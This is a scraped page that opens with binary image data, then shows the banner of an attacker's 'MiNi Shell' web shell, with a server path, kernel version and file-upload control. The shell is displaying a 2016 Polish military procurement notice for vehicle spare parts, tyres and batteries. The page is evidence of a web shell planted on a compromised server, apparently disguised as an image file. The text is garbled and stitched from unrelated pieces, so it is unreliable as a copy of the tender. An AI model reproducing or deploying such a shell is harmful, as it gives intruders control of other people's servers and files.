JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160518/55327-N-2016.html

<p class="kh_header"><b>Rzeszów: Dostawa części zamiennych i akcesoriów do pojazdów i silników dla 34 Wojskowego Oddziału Gospodarczego w Rzeszowie (zamówienie z podziałem na 6 części)</b><br>
<b>Numer ogłoszenia: 55327 - 2016; data zamieszczenia: 18.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 34 Wojskowy Oddział Gospodarczy w Rzeszowie , ul. Krakowska 11B, 35-111 Rzeszów, woj. podkarpackie, tel. 261 15 56 59, faks 261 15 63 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.34wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych i akcesoriów do pojazdów i silników dla 34 Wojskowego Oddziału Gospodarczego w Rzeszowie (zamówienie z podziałem na 6 części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi dostawa części zamiennych i akcesoriów do pojazdów i silników dla 34 Wojskowego Oddziału Gospodarczego w Rzeszowie
2. Przedmiot zamówienia podzielony został na 6 następujących części
1) Część nr 1 (zadanie nr 1): dostawa części zamiennych do pojazdów STAR 200, 266, 944, 1466,  IVECO:
a) Przedmiot zamówienia obejmuje swym zakresem dostawę m.in. następującego asortymentu: uszczelki pod głowice, łączniki gumowe, zespoły pasków klinowych, tarcze dociskowe, łożyska, pierścienie uszczelniające, uszczelki korka spustu oleju, szczęki hamulcowe, okładziny szczęki, nity okładziny, cylindry hamulcowe, przewody hamulcowe, czujniki spadku ciśnienia, regulatory siły hamowania, złącza automatyczne sterujące, tuleje wieszaka resoru, drążki reakcyjne, obsady z uszczelniaczami osi resorów, koła kierownicze, przeguby kulowe, pompy sprzęgła, zbiorniki paliwa, uszczelki miedziane, węże gumowe, osłony gumowe siłownika, sworznie awaryjne, lampy tylne zespolone, klosze lampy tylnej, szkła odblaskowe, żarówki jednoświatłowe, lampy przeciwmgłowe, sygnały dźwiękowe, uszczelnienia pedału, mechanizmy klamki, okna odwietrznika, klamki, uszczelki szyby, korytka szyby, pióra wycieraczek, ramię wycieraka, lusterka, przerywacze kierunkowskazów, odłączniki akumulatorów, wałki napędu prędkościomierza, przełączniki zespolone, wyłączniki 12V, reflektory, elementy optyczne reflektora, żarówki halogenowe, wkłady przełącznika akumulatora, nakładki ażurowe, złącza przewodu powietrznego, leżanka kabiny, przewody poliamidowe ciśnieniowe, uchwyty gumowe skrzynki akumulatora, przewody przelewowe, uszczelki gumowe na drzwi, cięgła zamków, nakładki progu kabiny, podpórki maski silnika, poszycia deski rozdzielczej, przewody hamulcowe, pokrowce maski silnika, pokrowce na chłodnice, rozruszniki, uchwyty holownicze, sworznie uchwytów holowniczych, przetyczki sworznia, łożyska itp.;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 1 zawarty został w Załączniku nr 1A do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
2) Część nr 2 (zadanie nr 2): dostawa części zamiennych do pojazdów: HONKER, TARPAN, LUBLIN
a) Przedmiot zamówienia swym zakresem obejmuje dostawę m.in. następującego asortymentu:  czujniki temperatury, wentylatory, poduszki zawieszenia, wsporniki mocowania, uszczelki głowicy, termostaty układu chłodzenia, uszczelki miski oleju, komplety uszczelek kadłuba, pierścienie uszczelniające, przewody pompy podciśnieniowej, pierścienie uszczelniające, zawory przelewowe, pompy wody, komplety uszczelek pompy wody, pasy klinowe napędu alternatora, sprężyny napinacza, przewody paliwa, podkładki końcówki złącza przewodów paliwa, przewody giętkie paliwa wtryskiwaczy, pompy paliwa, kolanka gumowe turbosprężarki, uszczelki kolanka wylotowego turbosprężarki, pompki ręczne paliwa, siłowniki elektromagnetyczne pompy wtryskowej, zbiorniki paliwa, przewody ssące filtra powietrza, przewody chłodnicy powietrza, kolanka chłodnicy, łączniki elastyczne mocowania chłodnicy, przewody chłodnicy, zbiorniki odgazowujące, przewody odpowietrzające, pierścienie uszczelniające rury wydechowej, strzemię rury tłumika, wieszaki gumowe tłumika, cięgna elastyczne sterowania sprzęgłem, siłowniki wspomagania, sprzęgła, siłowniki załączania sprzęgła, pierścienie dociskowe sprzęgła, tarcze sprzęgła, dociski sprzęgła, łożyska wyciskowe, pierścienie Simmera, wały napędowe, podpory wału, nakrętki wałka napędzającego, sworznie zwrotnicy, łożyska sworznia zwrotnicy, pierścienie uszczelniające sworznia zwrotnicy, przeguby 2-krzyżakowe mostu przedniego, krzyżaki wzmocnione, półosie tylnego mostu, łączniki elastyczne, śruby tulei wieszaka resoru tylnego, nakrętki śruby tulei, tuleje, przewody wysokociśnieniowe, zbiornik oleju układu wspomagania kierownicy, pompy zasilające wspomaganie układu kierowniczego, szczęki hamulcowe, zbiorniki spryskiwacza, drzwi, nasadka drzwi, poszycia progów, łożyska;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 2 zawarty został w Załączniku nr 1B do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
3) Część nr 3 (zadanie nr 3): dostawa części zamiennych - filtry oleju, paliwa, powietrza;
a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: filtry oleju, filtry paliwa, filtry powietrza, separatory powietrza, separatory wody, wkłady filtrujące, filtry kabinowe, 
b) Szczegółowy opis przedmiotu zamówienia dla części nr 3 zawarty został w Załączniku nr 1C do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
4) Część nr 4 (zadanie nr 4): dostawa opon, dętek i ochraniaczy dętek;
a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: opony, dętki, ochraniacze dętki;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 4 zawarty został w Załączniku nr 1D do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
5) Część nr 5 (zadanie nr 5): dostawa akumulatorów kwasowych;
a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: akumulatory kwasowo-rozruchowe;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 5 zawarty został w Załączniku nr 1E do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
6) Część nr 6 (zadanie nr 6): dostawa części zamiennych do BRDM-2, BRDM-ŻBIK
a) Przedmiot zamówienia obejmuje swym zakresem dostawę następującego asortymentu: szczęki hamulcowe, cylindry hamulcowe, pierścienie uszczelniające, wentylatory nawiewu, świece zapłonowe, końcówki drążka kierowniczego, drążki ramienia, uszczelniacze, łożyska zwrotnicy, zbiorniki paliwa, gaźniki, przewody wysokiego napięcia, strzemię resoru, poduszki resoru, amortyzatory, tulejki amortyzatora, przewody hamulcowe, cylindry wspomagacza, pompy hamulcowe, filtry dokładnego oczyszczania paliwa, tłumiki kompletne, rozruszniki, zespoły pasów, paski klinowe, sprzęgła, lampy, pompy sprzęgła, dźwignie przełączania biegów, pompy paliwa, widełki przegubu napędu wentylatora, wałki napędu wentylatora, zawory sterowania wspomagania, przełączniki;  
b) Szczegółowy opis przedmiotu zamówienia dla części nr 6 zawarty został w Załączniku nr 1F do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;
3. Dostawy realizowane będą sukcesywnie (maksymalnie 4 dostawy) w okresie od daty zawarcia umowy do dnia 30 sierpnia 2016 r.
4. Miejscem dostawy oraz odbioru jakościowo-ilościowego przedmiotu zamówienia będą magazyny 34 Wojskowego Oddziału Gospodarczego  w miejscowościach: Rzeszów, Nisko, Żurawica, Jarosław.
5. Części zamienne stanowiące przedmiot zamówienia muszą być fabrycznie nowe, przez co rozumieć należy posiadające bieżący rok produkcji lub poprzedni - jednak nie wcześniejszy niż 12 miesięcy licząc wstecz od daty dostawy. 
6. Części zamienne muszą być wolne od wad i nie mogą nosić śladów używania i uszkodzenia oraz spełniać wszelkie wymogi polskich norm jakościowych.
7. Na każdym opakowaniu w sposób trwały musi być umieszczona informacja producenta, tzw. etykieta opakowania. Na etykiecie każdego opakowania musi być podana nazwa materiału, katalog oraz nazwa producenta. Wszystkie te informacje powinny być napisane w języku polskim.
8. Wykonawca udzieli gwarancji na dostarczone części zamienne na okres minimum jednego roku od momentu przyjęcia części zamiennych przez Zamawiającego (dotyczy zadań nr 1-4). 
Na akumulatory (zadanie nr 5) gwarancja ma wynosić minimum 24 miesiące, karty gwarancyjne należy dostarczyć wraz z akumulatorami, rok produkcji akumulatorów 2016. 34 Wojskowego Oddziału Gospodarczego nie zdaje akumulatorów zużytych.
Gwarancja na części zamienne do BRDM-2, BRDM-ŻBIK (zadanie nr 6) - zgodnie z warunkami umowy.
9. Części zamienne mają być zakonserwowane w taki sposób, aby umożliwić ich przechowywanie w magazynach nieogrzewanych przez minimum 12 miesięcy, licząc od daty ich dostarczenia Zamawiającemu.
10. Zamawiający zastrzega sobie w ramach wartości umowy, możliwość dokonywania zmian ilościowych, w poszczególnych rodzajach części zamiennych, polegających na przesunięciach pomiędzy poszczególnymi pozycjami załącznika nr 1A-1F  stosownie do rzeczywistych potrzeb Zamawiającego, przy zachowaniu cen jednostkowych podanych w ofercie. Przesunięcia pomiędzy poszczególnymi pozycjami załącznika nr 1A-1F nie mogą przekroczyć 20% maksymalnej wysokości zobowiązań Zamawiającego. Zamawiający zastrzega sobie również prawo do dokonania zmniejszenia wielkości przedmiotu zamówienia do 20% maksymalnej wysokości zobowiązań Zamawiającego, określonych w ofercie Wykonawcy (cena ofertowa) - dotyczy zadań nr 1-5. W przypadku zadania nr 6 zmniejszenie wielkości przedmiotu zamówienia nie przekroczy 10%. 
11. Uzupełnienie w zakresie opisu przedmiotu zamówienia stanowią postanowienia projektu umowy, tj. Załącznika nr 5A (zadanie nr 1-5) oraz Załącznika nr 5B (zadanie nr 6)  do SIWZ.
12. Zamawiający nie przewiduje zawarcia umowy ramowej. 
13. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, formularze kalkulacji ceny ofertowej, ew. pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.34wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej, jak również istnieje możliwość jej odebrania w Sekcji Zamówień Publicznych: ul. Krakowska 11B, 35-111 Rzeszów, budynek nr 12 pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 10:30, miejsce: 34 Wojskowy Oddział Gospodarczy w Rzeszowie, ul. Krakowska 11B, budynek nr 12, pok. nr 1 (kancelaria jawna), 35-111 Rzeszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy Pzp Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa części zamiennych do pojazdów STAR 200, 266, 944, 1466,  IVECO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia obejmuje swym zakresem dostawę m.in. następującego asortymentu: uszczelki pod głowice, łączniki gumowe, zespoły pasków klinowych, tarcze dociskowe, łożyska, pierścienie uszczelniające, uszczelki korka spustu oleju, szczęki hamulcowe, okładziny szczęki, nity okładziny, cylindry hamulcowe, przewody hamulcowe, czujniki spadku ciśnienia, regulatory siły hamowania, złącza automatyczne sterujące, tuleje wieszaka resoru, drążki reakcyjne, obsady z uszczelniaczami osi resorów, koła kierownicze, przeguby kulowe, pompy sprzęgła, zbiorniki paliwa, uszczelki miedziane, węże gumowe, osłony gumowe siłownika, sworznie awaryjne, lampy tylne zespolone, klosze lampy tylnej, szkła odblaskowe, żarówki jednoświatłowe, lampy przeciwmgłowe, sygnały dźwiękowe, uszczelnienia pedału, mechanizmy klamki, okna odwietrznika, klamki, uszczelki szyby, korytka szyby, pióra wycieraczek, ramię wycieraka, lusterka, przerywacze kierunkowskazów, odłączniki akumulatorów, wałki napędu prędkościomierza, przełączniki zespolone, wyłączniki 12V, reflektory, elementy optyczne reflektora, żarówki halogenowe, wkłady przełącznika akumulatora, nakładki ażurowe, złącza przewodu powietrznego, leżanka kabiny, przewody poliamidowe ciśnieniowe, uchwyty gumowe skrzynki akumulatora, przewody przelewowe, uszczelki gumowe na drzwi, cięgła zamków, nakładki progu kabiny, podpórki maski silnika, poszycia deski rozdzielczej, przewody hamulcowe, pokrowce maski silnika, pokrowce na chłodnice, rozruszniki, uchwyty holownicze, sworznie uchwytów holowniczych, przetyczki sworznia, łożyska itp.;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 1 zawarty został w Załączniku nr 1A do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia (dostaw cząstkowych) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa części zamiennych do pojazdów: HONKER, TARPAN, LUBLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiot zamówienia swym zakresem obejmuje dostawę m.in. następującego asortymentu:  czujniki temperatury, wentylatory, poduszki zawieszenia, wsporniki mocowania, uszczelki głowicy, termostaty układu chłodzenia, uszczelki miski oleju, komplety uszczelek kadłuba, pierścienie uszczelniające, przewody pompy podciśnieniowej, pierścienie uszczelniające, zawory przelewowe, pompy wody, komplety uszczelek pompy wody, pasy klinowe napędu alternatora, sprężyny napinacza, przewody paliwa, podkładki końcówki złącza przewodów paliwa, przewody giętkie paliwa wtryskiwaczy, pompy paliwa, kolanka gumowe turbosprężarki, uszczelki kolanka wylotowego turbosprężarki, pompki ręczne paliwa, siłowniki elektromagnetyczne pompy wtryskowej, zbiorniki paliwa, przewody ssące filtra powietrza, przewody chłodnicy powietrza, kolanka chłodnicy, łączniki elastyczne mocowania chłodnicy, przewody chłodnicy, zbiorniki odgazowujące, przewody odpowietrzające, pierścienie uszczelniające rury wydechowej, strzemię rury tłumika, wieszaki gumowe tłumika, cięgna elastyczne sterowania sprzęgłem, siłowniki wspomagania, sprzęgła, siłowniki załączania sprzęgła, pierścienie dociskowe sprzęgła, tarcze sprzęgła, dociski sprzęgła, łożyska wyciskowe, pierścienie Simmera, wały napędowe, podpory wału, nakrętki wałka napędzającego, sworznie zwrotnicy, łożyska sworznia zwrotnicy, pierścienie uszczelniające sworznia zwrotnicy, przeguby 2-krzyżakowe mostu przedniego, krzyżaki wzmocnione, półosie tylnego mostu, łączniki elastyczne, śruby tulei wieszaka resoru tylnego, nakrętki śruby tulei, tuleje, przewody wysokociśnieniowe, zbiornik oleju układu wspomagania kierownicy, pompy zasilające wspomaganie układu kierowniczego, szczęki hamulcowe, zbiorniki spryskiwacza, drzwi, nasadka drzwi, poszycia progów, łożyska;
b) Szczegółowy opis przedmiotu zamówienia dla części nr 2 zawarty został w Załączniku nr 1B do SIWZ stanowiącym równocześnie formularz kalkulacji ceny ofertowej dla tej części zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0.</p></li>
